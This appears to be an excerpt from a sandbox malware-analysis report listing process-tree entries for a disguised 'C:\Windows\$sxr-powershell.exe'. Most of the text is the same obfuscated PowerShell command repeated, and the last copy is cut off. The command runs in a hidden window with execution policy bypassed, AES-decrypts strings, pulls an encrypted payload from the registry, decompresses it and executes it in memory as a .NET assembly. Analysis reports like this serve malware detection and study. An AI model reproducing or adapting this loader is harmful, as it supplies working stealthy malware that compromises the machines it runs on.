        30⤵
        
        PID:5548
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3644).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        30⤵
        
        PID:10136
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3644).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        30⤵
        Hide Artifacts: Hidden Window
        
        PID:8992
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3644).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        30⤵
        
        PID:4456
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3644).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 